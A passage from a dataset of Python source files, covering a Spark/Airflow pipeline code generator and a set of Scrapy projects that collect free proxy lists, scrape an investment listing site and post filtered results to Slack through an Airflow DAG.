"text": "from domain.ErrorTypes import ErrorTypes\nfrom validity import IncomingEdgeValidityChecker, DataSourceValidityChecker\nfrom utils import CodeGenerationUtils\n\nimport os\n\ndef generate_code(args):\n node=args[\"node\"]\n requireds_info=args[\"requireds_info\"]\n edges=args[\"edges\"]\n\n checklist={\"df_count\": {0}, \"model_count\": {0}}\n error, extra=IncomingEdgeValidityChecker.check_validity(node[\"id\"], requireds_info, edges, checklist)\n code=[]\n if(error == ErrorTypes.NO_ERROR):\n error, is_schema_appropriate=DataSourceValidityChecker.check_validity(node)\n if(error == ErrorTypes.NO_ERROR):\n remaining_params = node[\"parameters\"].keys()\n remaining_params.remove(\"file_path\")\n if(is_schema_appropriate):\n code.append(\"schema_\"+node[\"id\"]+\"=\")\n code.extend([CodeGenerationUtils.arrange_schema(node[\"parameter\"][\"schema\"]), os.linesep])\n code.append(\"df_\" + node[\"id\"] + \"=\" + \"spark.read.\"+ node[\"file_type\"] +\"(path=\" + CodeGenerationUtils.arrange_parameter_value(node[\"parameters\"][\"file_path\"] + \", \" + \"schema=\"+ \"schema_\"+node[\"id\"]))\n remaining_params.remove(\"schema\")\n else:\n if(node[\"can_infer_schema\"]):\n code.append(\"df_\" + node[\"id\"] + \"=\" + \"spark.read.\" + node[\"file_type\"] + \"(path=\" + CodeGenerationUtils.arrange_parameter_value(node[\"parameters\"][\"file_path\"]) +\", \" +\"inferSchema=\"+\"True\")\n else:\n code.append(\"df_\" + node[\"id\"] + \"=\" + \"spark.read.\" + node[\"file_type\"] + \"(path=\" + CodeGenerationUtils.arrange_parameter_value(node[\"parameters\"][\"file_path\"]))\n\n for param in remaining_params:\n code.extend([\", \" + param + \"=\" + CodeGenerationUtils.arrange_parameter_value(node[\"parameters\"][param])])\n code.extend([\")\", os.linesep])\n\n return code, error"
},
{
"alpha_fraction": 0.6475953459739685,
"alphanum_fraction": 0.6488391160964966,
"avg_line_length": 39.8983039855957,
"blob_id": "a1c9324fea11fe21ff91f12de1f230a7660693cc",
"content_id": "e1de2e9d750c63724f3367b90046c3dd1e35de1f",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2412,
"license_type": "permissive",
"max_line_length": 196,
"num_lines": 59,
"path": "/arakat-backend/pipeline_generator/ScheduleGenerator.py",
"repo_name": "temizkanekin/arakat",
"src_encoding": "UTF-8",
"text": "from utils import CodeGenerationUtils\n\nimport os\n\n# spark_runner_path is relative to the airflow server/cluster such that airflow will use this bash script with BashOperator.\n\n# Maybe later read them from config files...\n__set_of_datetime_arguments={\"start_date\", \"end_date\"}\n__datetime_format=\"%d/%m/%Y\"\n\n# No need to keep data/state, so I did not make it a class..\n# This will be safe for multi-thread use as well~\n\ndef generate_code(task_nodes, task_edges, args):\n # Add error checks\n errors=[]\n dag_code = __generate_imports()\n dag_code.extend(__instantinate_dag(args[\"dag_args\"]))\n for task_node_id in task_nodes:\n dag_code.append(os.linesep)\n dag_code.extend(__create_bash_operator(task_node_id, args[\"spark_runner_path\"]))\n dag_code.append(os.linesep)\n\n dag_code.extend([os.linesep, os.linesep])\n for edge in task_edges:\n node_ids=edge.split(\"-\")\n dag_code.append(os.linesep)\n dag_code.append(\"Task_\"+node_ids[1]+\".set_upstream(\"+\"Task_\"+node_ids[0]+\")\")\n dag_code.append(os.linesep)\n\n return dag_code, errors\n\n\ndef __generate_imports():\n import_code=[\"from airflow import DAG\", os.linesep,\n \"from airflow.operators.bash_operator import BashOperator\", os.linesep,\n \"from datetime import datetime\",os.linesep,os.linesep]\n return import_code\n\ndef __instantinate_dag(airflow_args):\n dag_code=['dag = DAG(\"' + airflow_args[\"app_id\"] + '\", default_args=' + __arg_dict_to_string(airflow_args[\"default_args\"]) + ', schedule_interval=\"' + airflow_args[\"schedule_interval\"] + '\")']\n dag_code.append(os.linesep)\n return dag_code\n\ndef __create_bash_operator(task_id, spark_runner_path):\n return ['Task_'+task_id+'= BashOperator(task_id=\"'+task_id+'\", bash_command=\"'+spark_runner_path+' Task_'+task_id+'.py \", dag=dag)']\n\ndef __arg_dict_to_string(args):\n # Assuming that corresponding argument is a string which is appropriate for pre-defined datetime format.\n code=[\"{\"]\n for arg in args:\n if(arg in __set_of_datetime_arguments):\n code.extend(['datetime.strptime(\"' + args[arg] + '\", \"' + __datetime_format +'\")', \",\"])\n else:\n code.extend([CodeGenerationUtils.arrange_parameter_value(arg), \": \", CodeGenerationUtils.arrange_parameter_value(args[arg]), \",\"])\n if (len(args) > 0):\n code.pop()\n code.append(\"}\")\n return ''.join(code)"
},
{
"alpha_fraction": 0.62442547082901,
"alphanum_fraction": 0.6290216445922852,
"avg_line_length": 43.82352828979492,
"blob_id": "7f31098a3384a4c8db30fc8379cb523b7b04a341",
"content_id": "dc71165cccf277489cd5e87362e68886ee40c6e3",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1523,
"license_type": "permissive",
"max_line_length": 152,
"num_lines": 34,
"path": "/arakat-backend/pipeline_generator/family_base/StreamWriteToFile.py",
"repo_name": "temizkanekin/arakat",
"src_encoding": "UTF-8",
"text": "from domain.ErrorTypes import ErrorTypes\nfrom validity import IncomingEdgeValidityChecker\nfrom utils import CodeGenerationUtils\n\nimport os\n\ndef generate_code(args):\n node = args[\"node\"]\n requireds_info = args[\"requireds_info\"]\n edges = args[\"edges\"]\n\n checklist={\"df_count\": {1}, \"model_count\": {0}}\n error, extra=IncomingEdgeValidityChecker.check_validity(node[\"id\"], requireds_info, edges, checklist)\n code=[]\n if(error == ErrorTypes.NO_ERROR):\n if (bool(extra[\"dfs\"])):\n df_name = \"df_\" + extra[\"dfs\"][0]\n else:\n df_name = \"df_\" + extra[\"portions\"][0][0] + \"[\" + str(extra[\"portions\"][0][1]) + \"]\"\n\n code.append(\"query_\" + node[\"id\"] + \"=\" + df_name + \".writeStream.format(\"+CodeGenerationUtils.arrange_parameter_value(node[\"file_type\"])+\")\")\n code.append(\".trigger(\"+ __generate_trigger_code(node) +\")\")\n code.append('.option(\"path\", '+ CodeGenerationUtils.arrange_parameter_value(node[\"parameters\"][\"file_path\"]) + \")\")\n code.append('.option(\"checkpointLocation\", ' + CodeGenerationUtils.arrange_parameter_value(node[\"parameters\"][\"checkpoint_path\"]) + \").start()\")\n code.extend([os.linesep, \"query_\" + node[\"id\"], \".awaitTermination()\", os.linesep])\n\n return code, error\n\ndef __generate_trigger_code(node):\n trigger_type=node[\"parameters\"][\"trigger_type\"]\n if(trigger_type == \"once\"):\n return \"once=True\"\n else:\n return trigger_type + \"=\" + \"'\" + str(node[\"parameters\"][\"trigger_value\"])+\" seconds'\""
},
{
"alpha_fraction": 0.620512843132019,
"alphanum_fraction": 0.6217948794364929,
"avg_line_length": 35.5625,
"blob_id": "dc5f84a9e366f14b2e6d01aef8cbb8d4d2b23898",
"content_id": "0881435660cf7e270a39f4b20313ae33611f5b5e",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2340,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 64,
"path": "/arakat-backend/pipeline_generator/PipelineGenerator.py",
"repo_name": "temizkanekin/arakat",
"src_encoding": "UTF-8",
"text": "import GraphPreprocessor\nimport TaskGenerator\nimport ScheduleGenerator\nfrom domain.ErrorTypes import ErrorTypes\n\nfrom pprint import pprint\n\n# No need to keep data/state, so I did not make it a class..\n# This will be safe for multi-thread use as well~\n\ndef generate_pipeline(graph, args):\n success=False\n\n task_nodes, task_edges, error= __parse_graph(graph)\n # Re-consider the following...\n __add_app_id_to_task_nodes(task_nodes, args[\"scheduler_args\"][\"dag_args\"][\"app_id\"])\n if(error == ErrorTypes.NO_ERROR):\n task_codes, task_errors = __generate_task_codes(task_nodes)\n scheduler_code, scheduler_errors=ScheduleGenerator.generate_code(task_nodes, task_edges, args[\"scheduler_args\"])\n print_codes(task_codes, scheduler_code)\n\n if(not (bool(task_errors) or bool(scheduler_errors))):\n success=True\n __generate_task_scripts(task_codes, args[\"script_args\"])\n __generate_scheduler_script(scheduler_code, args[\"script_args\"])\n\n return success, {\"task_errors\": task_errors, \"scheduler_errors\": scheduler_errors}\n\n return success, {\"parsing_error\": error}\n\ndef __add_app_id_to_task_nodes(task_nodes, app_id):\n for task_node_id in task_nodes:\n task_nodes[task_node_id][\"app_id\"]=app_id\n\ndef __generate_task_scripts(task_codes, args):\n pass\n\ndef __generate_scheduler_script(scheduler_code, args):\n pass\n\ndef print_codes(task_codes, scheduler_code):\n print(\"Scheduler code\")\n pprint(scheduler_code)\n print(\"--------------------------------------------------------------------\")\n for tc in task_codes:\n print(\"Task_\"+tc)\n pprint(task_codes[tc])\n print(\"--------------------------------------------------------------------\")\n\ndef __generate_task_codes(task_nodes):\n task_codes = {}\n task_errors={}\n for task_node_id in task_nodes:\n task_code, errors = TaskGenerator.generate_code(task_nodes[task_node_id])\n task_codes[task_node_id]=task_code\n if(bool(errors)):\n task_errors[task_node_id]=errors\n\n return task_codes, task_errors\n\ndef __parse_graph(graph):\n # {\"graph\": {\"edges\":{\"nodeId1-nodeId2\": {...edge-props...}, ...}, \"nodes\": {\"nodeId1\": {...node-specs...}, ...}}}\n # Each node keeps its parent's id as well\n return GraphPreprocessor.preprocess_graph(graph)\n"
},
{
"alpha_fraction": 0.37505269050598145,
"alphanum_fraction": 0.39064475893974304,
"avg_line_length": 29.05063247680664,
"blob_id": "2b8ab452b5cec1e32f3dc74029d59f9972492303",
"content_id": "56d831a9afd48ac6ce2ec98b29623cfbaf978ac7",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2373,
"license_type": "permissive",
"max_line_length": 66,
"num_lines": 79,
"path": "/arakat-backend/examples/Example1.py",
"repo_name": "temizkanekin/arakat",
"src_encoding": "UTF-8",
"text": "from pipeline_generator import PipelineGenerator\n\ngraph={\n \"nodes\": {\n \"node1\":\n {\n \"id\": \"node1\",\n \"name\": \"Batch Read from CSV\",\n \"category\": 0,\n \"parent\": \"task1\",\n \"node_id\": 47,\n \"node_type\": 0,\n \"family\": 0,\n \"compatible_with_stream\": False,\n \"compatible_stream_output_modes\": [],\n \"compatible_with_spark_pipeline\": False,\n \"is_splitter\": False,\n \"produces_model\": False,\n \"can_infer_schema\": True,\n \"file_type\": \"csv\",\n \"parameters\": {\n \"file_path\": \"filepath.csv\",\n \"header\": False,\n \"sep\": \",\",\n \"quote\": '\\\"'\n },\n \"df_constraints\": [],\n \"explanation\": \"Batch read from csv.\"\n },\n \"node2\":\n {\n \"id\": \"node2\",\n \"parent\": \"task1\",\n \"node_id\": 61,\n \"name\": \"Batch Write to Parquet\",\n \"category\": 1,\n \"node_type\": 0,\n \"family\": 2,\n \"compatible_with_stream\": False,\n \"compatible_stream_output_modes\": [],\n \"compatible_with_spark_pipeline\": False,\n \"is_splitter\": False,\n \"produces_model\": False,\n \"file_type\": \"parquet\",\n \"parameters\": {\n \"file_path\": \"targetfilepath.parquet\"\n },\n \"df_constraints\": [],\n \"explanation\": \"Batch write to parquet.\"\n },\n \"task1\": {\n \"id\": \"task1\",\n \"parent\": None,\n \"node_type\": 1\n }\n },\n \"edges\": {\"node1-node2\": {\"type\": \"dataframe\"}}\n}\n\n\nargs={\n \"scheduler_args\": {\n \"spark_runner_path\": \"my_spark_runner_path\",\n \"dag_args\": {\n \"app_id\": \"MyFirstApp\",\n \"default_args\": {\n \"owner\": \"airflow\",\n \"start_date\": \"01/01/2018\",\n \"end_date\": \"02/01/2018\",\n },\n \"schedule_interval\": \"@once\"\n }\n },\n \"script_args\": {\n\n }\n}\n\nsuccess, errors = PipelineGenerator.generate_pipeline(graph, args)"
}
] | 18 |
morefreeze/scrapy_projects
|
https://github.com/morefreeze/scrapy_projects
|
fcd4cf65cbf1d647ec3d4ae971914cc94d6a83ed
|
033b071b8c809d0b26aa4357712970dcba2e4bc0
|
919f739499fdd31aa3ea932cecb2585481f585b4
|
refs/heads/master
| 2022-11-17T17:39:42.193717 | 2020-11-08T09:45:35 | 2020-11-08T09:45:35 | 66,837,726 | 3 | 0 |
MIT
| 2016-08-29T11:26:55 | 2020-11-08T09:45:50 | 2022-11-04T19:44:07 |
Python
|
[
{
"alpha_fraction": 0.6215753555297852,
"alphanum_fraction": 0.6232876777648926,
"avg_line_length": 24.39130401611328,
"blob_id": "0d326c73eee829c8f53de1a38e4924f5cc6cd758",
"content_id": "0d06fdddd4af8745a1e4dcb49ae45b14d8df23e5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 584,
"license_type": "permissive",
"max_line_length": 86,
"num_lines": 23,
"path": "/proxy/proxy/db.py",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "# coding: utf-8\nimport redis\nimport logging\nimport settings\n\n\nclass RedisPool(object):\n\n @classmethod\n def get_pool(cls, redis_host, redis_port, redis_db):\n \"\"\"build a redis connection\n :returns: a valid connection\n\n \"\"\"\n try:\n pool = redis.ConnectionPool(host=redis_host, port=redis_port, db=redis_db)\n return redis.Redis(connection_pool=pool)\n except Exception as e:\n logging.error('connection redis error[%s]' % (e))\n raise\n\ndef build_key(keys, sep=settings.REDIS_SEP):\n return sep.join(keys)\n"
},
{
"alpha_fraction": 0.6252737045288086,
"alphanum_fraction": 0.6340318918228149,
"avg_line_length": 26.799999237060547,
"blob_id": "1ef7667f33099b7f91add303697c2b6c74ce9d1a",
"content_id": "ff5ee63db91a88343b870f2d10ea4dbd687cd3ef",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3197,
"license_type": "permissive",
"max_line_length": 142,
"num_lines": 115,
"path": "/small/noticable_tpl/notice_dag.py",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "# coding: utf-8\nfrom os import path, environ\nfrom StringIO import StringIO\nfrom airflow import DAG\nfrom airflow.operators import BashOperator, BranchPythonOperator, PythonOperator, SlackAPIPostOperator\nfrom utils import period2timedelta, money2float\nfrom filter import Filter\nimport datetime\nimport pandas as pd\n\n\n# This store text that will sent by slack\nslack_message_key = 'slack_message'\n# This store data file which maybe checked\ncsv_file = 'xy.csv'\ndir = path.abspath(path.dirname(__file__))\n\n\n# If now() - execution_date >= long_time, spider won't run.\ndef need_run(ti, execution_date, **kwargs):\n long_time = datetime.timedelta(seconds=60*10)\n if ti.start_date and execution_date and ti.start_date - execution_date < long_time:\n return 'run_spider'\n return ''\n\n\ndef filter_data(csv_file, **kwargs):\n f = pd.read_csv(csv_file)\n candidate = []\n filter = Filter()\n filter.install_rule(lambda v: not v['title'].startswith('test'))\n for row in f.iterrows():\n idx, v = row\n item = {\n 'title': v['title'],\n }\n if filter.check(item):\n candidate.append(item)\n return candidate\n\n\n# If len(candicate) > 0 will send to slack, the text will store as slack_txt_file\ndef need_slack(ti, **kwargs):\n candidate = ti.xcom_pull(key=None, task_ids='filter_data')\n try:\n os.remove(slack_txt_file)\n except:\n pass\n if candidate and len(candidate) > 0:\n s = StringIO()\n for can in candidate:\n s.write('%s\\n' % (\n can['title'],\n ))\n ti.xcom_push(slack_message_key, s.getvalue().decode('utf-8'))\n return 'post_slack'\n return ''\n\n\ndefault_args = {\n 'owner': 'airflow',\n 'depends_on_past': False,\n 'start_date': datetime.datetime(2017, 1, 5),\n 'email': ['[email protected]', ],\n 'email_on_failure': True,\n 'email_on_retry': True,\n 'retries': 3,\n 'retry_delay': datetime.timedelta(minutes=5),\n 'queue': 'bash_queue',\n 'provide_context': True,\n 'retry_exponential_backoff': True,\n # 'end_date': datetime.datetime(2017, 1, 1),\n}\n\ndag = DAG('xiaoying', default_args=default_args, schedule_interval='*/5 8-22 * * *')\n\n\nonly_run_now = BranchPythonOperator(\n task_id='only_run_now',\n python_callable=need_run,\n dag=dag\n)\nrun_spider = BashOperator(\n task_id='run_spider',\n bash_command='cd {dir} && rm -f {csv_file} && scrapy runspider spiders/invest.py -t csv -o {csv_file}'.format(dir=dir, csv_file=csv_file),\n dag=dag\n)\n\nfilter_data = PythonOperator(\n task_id='filter_data',\n python_callable=filter_data,\n op_args=(csv_file, ),\n dag=dag\n)\n\nneed_slack = BranchPythonOperator(\n task_id='need_slack',\n python_callable=need_slack,\n dag=dag\n)\n\nslack_token = environ.get('SLACK_TOKEN')\ntxt = '''{{ task_instance.xcom_pull(task_ids='need_slack', key='%s') }}''' % (slack_message_key)\nif txt is None:\n txt = 'Nothing to read'\npost_slack = SlackAPIPostOperator(\n task_id='post_slack',\n token=slack_token,\n channel='#xiaoying',\n username='airflow',\n text='{{ execution_date }}\\n' + txt,\n dag=dag\n)\n\nonly_run_now >> run_spider >> filter_data >> need_slack >> post_slack\n"
},
{
"alpha_fraction": 0.5915399789810181,
"alphanum_fraction": 0.6153337955474854,
"avg_line_length": 22.27692222595215,
"blob_id": "2a092f1b9338bc5af06e74008b7debfaae14da2d",
"content_id": "c866c7fe7fc7f67e3997c1d7f45982d46b0d68c9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1513,
"license_type": "permissive",
"max_line_length": 62,
"num_lines": 65,
"path": "/proxy/proxy/simple_proxy.py",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "# coding: utf-8\nimport csv\nimport sys\nimport datetime\nimport urllib\nimport urllib2\nimport gevent\nfrom gevent.local import local\n\n\ndef test_url(opener, url):\n try:\n resp = opener.open(url, timeout=TIMEOUT)\n if resp and resp.code == 200:\n return True\n except Exception as e:\n print e\n return False\n\nstash = local()\nstash.gfw_succ = False\nstash.normal_succ = False\ncandidate_proxies = [\n '103.4.167.230:8080',\n '220.113.26.18:8080',\n]\ngfw_urls = [\n 'http://google.com',\n 'http://facebook.com',\n 'http://twitter.com',\n 'http://youtube.com',\n 'http://pornhub.com',\n]\nnormal_urls = [\n 'http://baidu.com',\n 'http://weibo.com',\n 'http://zhihu.com',\n 'http://tower.im',\n 'http://www.acfun.tv',\n]\nTIMEOUT = 3\ndef gfw_func(opener, url):\n if test_url(opener, url):\n stash.gfw_succ = True\n\ndef normal_func(opener, url):\n if test_url(opener, url):\n stash.normal_succ = True\n\nfor proxy in candidate_proxies:\n print \"Trying HTTP proxy %s\" % proxy\n ph = urllib2.ProxyHandler({'http': proxy})\n opener = urllib2.build_opener(ph)\n threads = []\n for url in gfw_urls:\n threads.append(gevent.spawn(gfw_func, opener, url))\n gevent.joinall(threads)\n threads = []\n for url in normal_urls:\n threads.append(gevent.spawn(normal_func, opener, url))\n gevent.joinall(threads)\n if stash.gfw_succ:\n print '%s is good for gfw' % (proxy)\n if stash.normal_succ:\n print '%s is good' % (proxy)\n"
},
{
"alpha_fraction": 0.48787447810173035,
"alphanum_fraction": 0.515691876411438,
"avg_line_length": 23.59649085998535,
"blob_id": "5c0a9fae1e54fe69863f2cd651622567abfb638a",
"content_id": "4f615ae88892b77e44c9cc7bd4df580404ab0f17",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1402,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 57,
"path": "/proxy/proxy/spiders/kdl_spider.py",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "# coding: utf-8\nimport csv\nimport sys\nimport datetime\nfrom tqdm import tqdm\nimport urllib\nimport urllib2\nimport re\nimport scrapy\nimport redis\n\n\nclass KDLSpider(scrapy.Spider):\n name = 'kuaidaili_spider'\n IP_REGEX = re.compile('\\\\b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.){3}\\\n(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\\\b')\n start_urls = [\n 'http://www.kuaidaili.com/free/inha/',\n 'http://www.kuaidaili.com/free/intr/',\n 'http://www.kuaidaili.com/free/outha/',\n 'http://www.kuaidaili.com/free/outtr/',\n ]\n\n \"\"\"Get proxy ip from url\"\"\"\n\n def __init__(self, page=2):\n \"\"\"\"\"\"\n self.page = int(page)\n\n def parse(self, response):\n \"\"\"parse crawl page\n\n :response: TODO\n :returns: None\n\n \"\"\"\n # debug\n # from scrapy.shell import inspect_response\n # inspect_response(response, self)\n for i in range(1, self.page+1):\n yield scrapy.Request(\n response.request.url + '%s' % (i),\n self.parse_ip,\n dont_filter=True,\n )\n\n def parse_ip(self, response):\n \"\"\"parse ip\n\n :response: TODO\n :returns: TODO\n\n \"\"\"\n for tr in response.xpath('//table//tr'):\n tds = tr.xpath('td/text()')\n if len(tds) > 2:\n yield {'ip': tds[0].extract(), 'port': tds[1].extract()}\n"
},
{
"alpha_fraction": 0.6125289797782898,
"alphanum_fraction": 0.6658932566642761,
"avg_line_length": 24.352941513061523,
"blob_id": "c3231461172931a00e3102a1e47b1a2db0f9f074",
"content_id": "75fc5f84187a13b7a316f59fd86326380b3256a6",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 431,
"license_type": "permissive",
"max_line_length": 48,
"num_lines": 17,
"path": "/proxy/proxy/test_checker.py",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "# coding: utf-8\nfrom checker import NormalChecker, LadderChecker\nimport logging\n\n# Both test need run cow on local\ndef test_normal_proxy():\n test_host = 'http://127.0.0.1:7777'\n nc = NormalChecker(test_host, timeout=5)\n nc.check_proxy()\n assert nc.ret['ping']\n\n\ndef test_normal_proxy():\n test_host = 'http://127.0.0.1:7777'\n nc = LadderChecker(test_host, timeout=5)\n nc.check_proxy()\n assert nc.ret['ping']\n"
},
{
"alpha_fraction": 0.7432098984718323,
"alphanum_fraction": 0.7580246925354004,
"avg_line_length": 39.5,
"blob_id": "3d50dc741ec5ce7c5767202fed2a54c8f1e242b1",
"content_id": "3e22c9a71be162707d450c274a2c0370814009aa",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 405,
"license_type": "permissive",
"max_line_length": 103,
"num_lines": 10,
"path": "/proxy/proxy/readme.md",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "First scrapy some proxy candidates using spiders, run `checker.py` to check them\nby connecting httpbin website each EXPIRE_DELTA(default 3 hours).\n\n```shell\nscrapy runspider spiders/kdl_spider.py -a page=3\npython checker.py # run forever, use c-c to break\n```\n\n`redis-cli -p 4149` to connect redis,\ncheck out `srandmember normal` (only for inside website) or `srandmember gfw` (may connect fb, twitter)\n"
},
{
"alpha_fraction": 0.5102880597114563,
"alphanum_fraction": 0.5131687521934509,
"avg_line_length": 36.96875,
"blob_id": "2aba67a5fe81e093c7a0c45411b8eb7e5abab713",
"content_id": "89740df2f56d8c4fa4e995dc5a175949d1d31e27",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2454,
"license_type": "permissive",
"max_line_length": 118,
"num_lines": 64,
"path": "/small/xiaoying/spiders/invest.py",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nimport scrapy\nimport json\n\n\ndef safe_list_get(l, idx, default=''):\n return l[idx] if len(l) > idx else default\n\n\nclass InvestmentSpider(scrapy.Spider):\n name = 'Investment'\n allow_domain = ['xiaoying.com']\n cin_fields = {\n u'预期年化': 'expected_benefit',\n u'剩余期限': 'period',\n u'项目期限': 'period',\n }\n\n def __init__(self, url=None, page=None):\n if not url:\n url = 'https://www.xiaoying.com/invest/list?status=COLLECT'\n if not page:\n page = 1\n self.start_url = '%s&p1=%s' % (url, page)\n\n def start_requests(self):\n if self.start_url:\n return [scrapy.Request(\n self.start_url,\n callback=self.parse_item_follow_next_page,\n )]\n\n def parse_item_follow_next_page(self, response):\n lis = response.xpath('//div[contains(@class, \"card-in\")]')\n for li in lis:\n item = {}\n title_line = li.xpath('.//div[contains(@class, \"card-hd\")]')\n title = safe_list_get(title_line.xpath('./a/text()').extract(), 0, '')\n item['title'] = title\n sub_title = ','.join(title_line.xpath('./i/text()').extract())\n item['sub_title'] = sub_title\n cin_items = li.xpath('.//ul/li')\n cin_dict = {}\n for cin_item in cin_items:\n lhs, rhs = cin_item.xpath('./span/text()').extract()\n if lhs == '' and rhs == '':\n continue\n for (text, field_name) in self.cin_fields.items():\n if lhs.startswith(text):\n item[field_name] = rhs\n break\n cin_dict[lhs] = rhs\n item['cin_items'] = cin_dict\n investing = safe_list_get(li.xpath('.//span[contains(@class, \"investing\")]/span/text()').extract(), 0, '')\n item['investing'] = investing\n money = safe_list_get(li.xpath('.//span[contains(@class, \"surplus\")]/span/text()').extract(), 0, '')\n item['money'] = money\n yield item\n\n pager = response.xpath('//div[contains(@class, \"pagination\")]')\n next_page = safe_list_get(pager.xpath('./span/following-sibling::a/@href').extract(), 0, '')\n if next_page:\n url = response.urljoin(next_page)\n yield scrapy.Request(url, callback=self.parse_item_follow_next_page)\n"
},
{
"alpha_fraction": 0.3333333432674408,
"alphanum_fraction": 0.5833333134651184,
"avg_line_length": 11,
"blob_id": "16fdc28f87f01f4089b4827fda585d401987a638",
"content_id": "da3e1e5f59d76072775c5daa77cb83e79eeb5bc5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 12,
"license_type": "permissive",
"max_line_length": 11,
"num_lines": 1,
"path": "/house/lianjia/requirements.txt",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "tqdm==4.8.4\n"
},
{
"alpha_fraction": 0.5064599514007568,
"alphanum_fraction": 0.5426356792449951,
"avg_line_length": 23.1875,
"blob_id": "cfa219e1f8df21c05f4460cc8d9cc96bcb7b5b9f",
"content_id": "a54206889a85f26b52d690d1d86ff451418d1ce2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1161,
"license_type": "permissive",
"max_line_length": 92,
"num_lines": 48,
"path": "/proxy/proxy/spiders/ip84_spider.py",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "# coding: utf-8\nimport csv\nimport sys\nimport datetime\nfrom tqdm import tqdm\nimport urllib\nimport urllib2\nimport re\nimport scrapy\nimport redis\n\n\n# This site seems contains harmful program.\nclass IP84Spider(scrapy.Spider):\n name = 'ip_spider'\n IP_REGEX = re.compile('\\\\b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.){3}\\\n(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\\\b')\n start_urls = ['http://ip84.com/dl']\n\n \"\"\"Get proxy ip from url\"\"\"\n\n def __init__(self):\n \"\"\"\"\"\"\n\n def parse(self, response):\n \"\"\"parse crawl page\n\n :response: TODO\n :returns: None\n\n \"\"\"\n # debug\n # from scrapy.shell import inspect_response\n # inspect_response(response, self)\n for i in range(1, 2):\n yield scrapy.Request(response.request.url + '/%s' % (i), callback=self.parse_ip)\n\n def parse_ip(self, response):\n \"\"\"parse ip\n\n :response: TODO\n :returns: TODO\n\n \"\"\"\n for tr in response.xpath('//table[@class=\"list\"]//tr'):\n tds = tr.xpath('td/text()')\n if len(tds) > 2:\n yield {'ip': tds[0].extract(), 'port': tds[1].extract()}\n"
},
{
"alpha_fraction": 0.5673701167106628,
"alphanum_fraction": 0.573051929473877,
"avg_line_length": 21.399999618530273,
"blob_id": "4f020397fb38b62cec260966d9fd3dc78c5affed",
"content_id": "461abca24f40e6628bba917d5fd5c2112267aa9b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1232,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 55,
"path": "/proxy/proxy/redis_queue.py",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "# coding: utf-8\nimport csv\nimport sys\nimport datetime\nfrom tqdm import tqdm\nimport urllib\nimport urllib2\nimport re\nimport redis\n\n\nclass RedisQueue(object):\n HOST = 'localhost'\n PORT = 4149\n DB = 0\n PUSHED_FMT = '%s:pushed'\n POPED_FMT = '%s:poped'\n\n \"\"\"Use redis implement a random array\"\"\"\n\n def __init__(self, name):\n \"\"\"\"\"\"\n self.poped_name = self.POPED_FMT % (name)\n self.pushed_name = self.PUSHED_FMT % (name)\n pool = redis.ConnectionPool(host=self.HOST, port=self.PORT, db=self.DB)\n self.conn = redis.Redis(connection_=pool)\n\n def push(self, ip):\n \"\"\"Push a ip to queue, check duplicate\n\n :ip: TODO\n :returns: TODO\n\n \"\"\"\n if not self.is_dup(ip):\n self.conn.sadd(self.pushed_name, ip)\n\n def pop(self):\n \"\"\"Pop the first ip and add it to poped\n :returns: TODO\n\n \"\"\"\n ret = self.conn.srandmember(self.pushed_name)\n if ret:\n self.conn.smove(self.pushed_name, self.poped_name, ret)\n return ret\n\n def is_dup(self, ip):\n \"\"\"Check duplicate of given ip\n\n :ip: TODO\n :returns: TODO\n\n \"\"\"\n return self.conn.sismember(self.poped_name, ip)\n"
},
{
"alpha_fraction": 0.5410385131835938,
"alphanum_fraction": 0.5452261567115784,
"avg_line_length": 28.850000381469727,
"blob_id": "e1d605070b07f67927c8a064db1f4a09e7a07fa6",
"content_id": "95a6d14670015fb4baa26b7b4522ad14379bd5a0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1194,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 40,
"path": "/small/noticable_tpl/simple.py",
